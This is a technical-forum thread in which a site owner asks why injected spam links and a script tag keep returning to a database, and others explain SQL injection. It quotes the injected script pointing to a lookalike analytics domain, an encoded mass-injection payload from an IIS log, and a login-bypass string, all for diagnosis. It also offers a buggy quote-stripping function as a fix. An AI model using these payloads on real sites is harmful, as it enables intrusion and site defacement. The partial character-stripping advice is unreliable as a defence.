lucienbond24
asked on
SQL virus code keeps readding itself after being removed; How do I stop it from rewriting itself in the DB?
We were able to remove the script / virus from the DB yesterday, but for some reason it showed up again today in the notes of some entries in our DB.
This is how the script looks like:
<script type='text/javascript' src='http://google-anallytics.com/urchin.js'></script><div style='display:none;'><a href='http://tests4all.org/1/'>losing weight despite hypothyroidism</a><a href='http://tests4all.org/2/'>commerce texas personal trainer technical school</a><a href='http://tests4all.org/3/'>quit smoking treatments</a><a href='http://tests4all.org/4/'>blue eyes in the news</a><a href='http://tests4all.org/5/'>tell cheated</a><a href='http://tests4all.org/6/'>australia's occupations</a><a href='http://tests4all.org/7/'>aimer partner</a><a href='http://tests4all.org/8/'>iq test tips</a><a href='http://tests4all.org/9/'>clairvoyant psychic readings infinite advice</a><a href='http://tests4all.org/10/'>past life afflications again</a><a href='http://tests4all.org/11/'>thuggin til my death date</a><a href='http://tests4all.org/12/'>lung cancer alternitve medicine</a></div>
Any answer would be appreciated. Thank you in advance!
This is how the script looks like:
<script type='text/javascript' src='http://google-anallytics.com/urchin.js'></script><div style='display:none;'><a href='http://tests4all.org/1/'>losing weight despite hypothyroidism</a><a href='http://tests4all.org/2/'>commerce texas personal trainer technical school</a><a href='http://tests4all.org/3/'>quit smoking treatments</a><a href='http://tests4all.org/4/'>blue eyes in the news</a><a href='http://tests4all.org/5/'>tell cheated</a><a href='http://tests4all.org/6/'>australia's occupations</a><a href='http://tests4all.org/7/'>aimer partner</a><a href='http://tests4all.org/8/'>iq test tips</a><a href='http://tests4all.org/9/'>clairvoyant psychic readings infinite advice</a><a href='http://tests4all.org/10/'>past life afflications again</a><a href='http://tests4all.org/11/'>thuggin til my death date</a><a href='http://tests4all.org/12/'>lung cancer alternitve medicine</a></div>
Any answer would be appreciated. Thank you in advance!
I've had experience with that one. You have bad programming in your website. If you check your web server logs, you'll find some VERY long entries to dynamic pages... Those are causing your SQL server to deploy this code to every text field in your DB.
The same thing is happening to me. How do i get this removed ?
And what do you mean by very ling entries to dynamic pages ?
A
And what do you mean by very ling entries to dynamic pages ?
A
To give you an example, the site I had to fix had a simple catalog in it. When you selected a product, you'd get the following link to click on:
http://www.mysite.com/itemdetail.asp?ItemID=55
And in the VBScript in the code behind, the program was:
sqlquery = "SELECT * FROM PRODUCTS WHERE ItemID = " & Request.QueryString("ItemI D")
Here's the problem...that code is open to a SQL Injection Attack.
What I saw in my IIS logs showed a call to that page that was HUGE actually and looked kind of like:
itemdetail.asp?ItemID=55;A BFFEDBCED< truncated because this was HUGE>
It was a little more complicated than that because there was actually some sort of funciton call that I dont remember before all of the crap, but it was some kind of call to have teh SQL Server decrypt the string and run it. When I decypted it manually, I found a SQL script that would scan your database for all the text fields in all the available tables, and then append the links to every text field.
You need to look into stored procedures or paramaterized queries...or even simply removing single quotes, double quotes, and semi-colons from your forms inputs before joining them to a SQL query.
http://www.mysite.com/itemdetail.asp?ItemID=55
And in the VBScript in the code behind, the program was:
sqlquery = "SELECT * FROM PRODUCTS WHERE ItemID = " & Request.QueryString("ItemI
Here's the problem...that code is open to a SQL Injection Attack.
What I saw in my IIS logs showed a call to that page that was HUGE actually and looked kind of like:
itemdetail.asp?ItemID=55;A
It was a little more complicated than that because there was actually some sort of funciton call that I dont remember before all of the crap, but it was some kind of call to have teh SQL Server decrypt the string and run it. When I decypted it manually, I found a SQL script that would scan your database for all the text fields in all the available tables, and then append the links to every text field.
You need to look into stored procedures or paramaterized queries...or even simply removing single quotes, double quotes, and semi-colons from your forms inputs before joining them to a SQL query.
Here's a link to microsoft's site that explains some of this SQL injection attack stuff:
http://msdn.microsoft.com/en-us/library/ms161953.aspx
http://msdn.microsoft.com/en-us/library/ms161953.aspx
Yeah, i have been over that, so its not a virus its someone injecting code in my database ?
Is this like a person trying to hack into our system ?
Is this like a person trying to hack into our system ?
Here's an example from a IIS site log that shows an example of this sort of attack...
2007-12-30 18:22:46 POST /itemdetail.asp?ItemID=55; DECLARE%20 @S%20NVARC HAR(4000); SET%20@S=C AST (0×4400450043004C004100520 0450020004 0005400200 0760061007 2006300680 0610072002 8003200350 0350029002 C0040004300200076006100720 0630068006 1007200280 0320035003 5002900200 0440045004 3004C00410 0520045002 0005400610062006C0065005F0 0430075007 20073006F0 0720020004 3005500520 053004F005 2002000460 04F0052002 000730065006C0065006300740 0200061002 E006E00610 06D0065002 C0062002E0 06E0061006 D006500200 0660072006 F006D0020007300790073006F0 062006A006 5006300740 0730020006 1002C00730 0790073006 3006F006C0 075006D006 E0073002000620020007700680 0650072006 5002000610 02E0069006 4003D00620 02E0069006 4002000610 06E0064002 00061002E00780074007900700 065003D002 7007500270 0200061006 E006400200 0280062002 E007800740 0790070006 5003D003900390020006F00720 0200062002 E007800740 0790070006 5003D00330 0350020006 F007200200 062002E007 80074007900700065003D00320 0330031002 0006F00720 0200062002 E007800740 0790070006 5003D00310 0360037002 90020004F00500045004E00200 0540061006 2006C00650 05F0043007 5007200730 06F0072002 0004600450 0540043004 80020004E00450058005400200 0460052004 F004D00200 0200054006 10062006C0 065005F004 3007500720 073006F007 200200049004E0054004F00200 0400054002 C004000430 0200057004 80049004C0 0450028004 0004000460 0450054004 30048005F00530054004100540 0550053003 D003000290 0200042004 5004700490 04E0020006 5007800650 0630028002 70075007000640061007400650 020005B002 7002B00400 054002B002 7005D00200 0730065007 40020005B0 027002B004 00043002B0027005D003D00720 0740072006 9006D00280 063006F006 E007600650 0720074002 8007600610 0720063006 800610072002C005B0027002B0 0400043002 B0027005D0 0290029002 B002700270 03C0073006 3007200690 0700074002 0007300720063003D006800740 0740070003 A002F002F0 063002E007 5006300380 0300031003 0002E00630 06F006D002 F0030002E006A0073003E003C0 02F0073006 3007200690 0700074003 E002700270 0270029004 6004500540 0430048002 0004E004500580054002000460 052004F004 D002000200 0540061006 2006C00650 05F0043007 5007200730 06F0072002 00049004E0054004F002000400 054002C004 0004300200 045004E004 4002000430 04C004F005 3004500200 0540061006 2006C0065005F0043007500720 073006F007 2002000440 0450041004 C004C004F0 0430041005 4004500200 0540061006 2006C0065005F0043007500720 073006F007 200%20AS%2 0NVARCHAR( 4000));EXE C(@S);|17 8|80040e14 | Unclosed_quotation_mark_be fore_the_c haracter_s tring_G;D ECLARE_@S_ NVARCHAR(4 000);SET_@ S=CAST (0×4400450043004C004100520 0450020004 0005400200 0760061007 2006300680 0610072002 8003200350 0350029002 C004000430020002. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+I ndy+Librar y) - 500 15248
As I said...LONG log file entry. That's what finally caugt my eye on cleaning out the website I was working on.
2007-12-30 18:22:46 POST /itemdetail.asp?ItemID=55;
As I said...LONG log file entry. That's what finally caugt my eye on cleaning out the website I was working on.
No, there is probably not an active person attacking your website. It is probably a virus/trojan/zombie that is automatically crawling the web trying to inject this crud into people's systems...so that when they get the virus, it tries to infect other web servers.
Bottom line is this...this attack is VERY easy to prevent. It is called input validation. You should NEVER add unfiltered variables that are supplied to the user to ANY sort of string you send straight to the database. Either filter them or send them through as parameters or part of a stored procedure.
First time I ever created a login system backed by a database, a friend showed me a simple SQL injection attack that allowed him access through my login EVERY time.
First time I ever created a login system backed by a database, a friend showed me a simple SQL injection attack that allowed him access through my login EVERY time.
So, which type of characters should I not allow in my DB ?
The login page already doesnt allow the ' character. What else you recommend ?
Other than that everything is behind the username/password page.
The login page already doesnt allow the ' character. What else you recommend ?
Other than that everything is behind the username/password page.
What did you do to prevent your injection attack, which type of characters did you not allowed in your login page ?
Should I do the same once they are passed the login page ? or that should be enough to prevent this bot from getting in .. and is there a way to know where it is inserting the code ? which ASP page.
Should I do the same once they are passed the login page ? or that should be enough to prevent this bot from getting in .. and is there a way to know where it is inserting the code ? which ASP page.
Here's what I did on my ASP pages....It's in VBScript.
However, you're MUCH better off looking into parametrized queries or stored procedures, but this usually solves the problem.
However, you're MUCH better off looking into parametrized queries or stored procedures, but this usually solves the problem.
Function StripSQL(txt)
StripSQL = Replace(text, "'", "")
StripSQL = Replace(StripSQL, ";", "")
StripSQL = Replace(StripSQL, Chr(34), "")
End Function
sqlquery = "SELECT * FROM PRODUCTS WHERE ItemID = " & StripSQL(Request.QueryString("ItemID"))
Should I do this in ALL my queries ? or just the one in the login page ?
Honestly, you'll want to do this on EVERY page where you rea a user supplied variable and append it to an SQL query. There's no good way to tell exactly which pages are being attacked because these attacks usually try all of your dynamic pages hoping for a hit. (Similar to a search engine crawler).
You most DEFINTELY want to get this code or some protection on a login page as it is VERY easy to bypass a login page that is open to SQL injection attacks. For instance, take this query:
loginSQL = "SELECT * FROM User WHERE UserName = '" & Request.Form("User") & "' AND Password = '" & Request.Form("Password") & "'"
Soooo, what would happen if I put these credentials in:
User --> ' OR 'test' = 'test
Password --> ' OR 'test' = 'test
If we look at the SQL query that would result if after doing the VBScript line above with these credentials, we see:
SELECT * FROM User WHERE UserName = ' ' OR 'test' = 'test' AND Password = ' ' OR 'test' = 'test'
Hmmm, that's not good is it, you'll get quite a bit back won't you, like maybe the entire table? And isn't the admin account sometimes the first account in the user table? Ouch...so with that simple injection on an un-protected login page, I may have just gotten logged in with ADMIN credentials! Woopsie!
Notice that my example is defeated instanatly by stripping quotes out...and the attack that injects the script for your server to execute is defeated by removing semi-colons.
You most DEFINTELY want to get this code or some protection on a login page as it is VERY easy to bypass a login page that is open to SQL injection attacks. For instance, take this query:
loginSQL = "SELECT * FROM User WHERE UserName = '" & Request.Form("User") & "' AND Password = '" & Request.Form("Password") & "'"
Soooo, what would happen if I put these credentials in:
User --> ' OR 'test' = 'test
Password --> ' OR 'test' = 'test
If we look at the SQL query that would result if after doing the VBScript line above with these credentials, we see:
SELECT * FROM User WHERE UserName = ' ' OR 'test' = 'test' AND Password = ' ' OR 'test' = 'test'
Hmmm, that's not good is it, you'll get quite a bit back won't you, like maybe the entire table? And isn't the admin account sometimes the first account in the user table? Ouch...so with that simple injection on an un-protected login page, I may have just gotten logged in with ADMIN credentials! Woopsie!
Notice that my example is defeated instanatly by stripping quotes out...and the attack that injects the script for your server to execute is defeated by removing semi-colons.
This is my query from the login page, is this OK ?
select * from dbo.vulogdtls WHERE Loginid = '"+ EmployeeLogin__usxusername .replace(/ '/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword .replace(/ '/g, "''") + "' AND (ExpDate >= getdate() OR ExpDate IS NULL)";
Would a robot be able to do this in pages that are password protected ? ( If a session doesnt exist it redirects you.)
select * from dbo.vulogdtls WHERE Loginid = '"+ EmployeeLogin__usxusername
Would a robot be able to do this in pages that are password protected ? ( If a session doesnt exist it redirects you.)
It *shouldn't* be able to, but it depends on how your code works. If it processes ANYTHING before the redirect happens, it could be vulnerable.
Also, in all honesty, best practices state that you probably don't want to pull the record based on both username AND password.
Select from users where username = supplied username
if recordset found then see if supplied password is equal to the password in the recordset
If recordset not found or supplied password doesn't equal the one in the recrodset, raise an error.
Also, in all honesty, best practices state that you probably don't want to pull the record based on both username AND password.
Select from users where username = supplied username
if recordset found then see if supplied password is equal to the password in the recordset
If recordset not found or supplied password doesn't equal the one in the recrodset, raise an error.
Thats what I do ... so perhaps this is being done from another page ?
Can a robot navigate to password secured pages ?
Can a robot navigate to password secured pages ?
It depends on your web server's setup and how the authentication is controlled. If you're using a simple cookie 'token' authentication method, then yes, a robot can navigate to password secured pages. Other authentication methods *might* disallow navigation to protected pages (.net's FormAuthentication for instance will block even navigation of secured .aspx pages without a token)
We use session variables, but we do store the user/passwd in a cookie, which basically just displays them in the login page next time user goes in.
ASKER
We are able to remove the code from the DB but we are having a hard time finding where the SQL injection is coming from. Thoughts?
As I stated, it is most likely coming from someone sending a 'package' through a dynamic page on your site. Common targets are login pages and catalog pages.
We got the code back from the trace, we identified the code to be from one of our pages which saves a lot of data into the database. Ill keep everyone posted.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.